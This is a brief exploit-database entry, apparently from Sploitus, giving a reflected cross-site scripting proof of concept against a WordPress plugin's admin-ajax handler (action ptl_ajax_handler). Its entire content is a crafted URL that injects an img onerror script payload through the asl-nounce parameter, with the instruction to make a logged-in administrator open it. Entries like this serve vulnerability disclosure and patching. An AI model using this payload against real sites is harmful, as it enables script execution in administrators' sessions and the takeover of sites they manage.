## https://sploitus.com/exploit?id=WPEX-ID:1C126869-0AFA-456F-94CC-10334964E5F9 Make a logged in admin open the URL below https://example.com/wp-admin/admin-ajax.php?action=ptl_ajax_handler&asl-nounce=<img src onerror=alert`XSS`>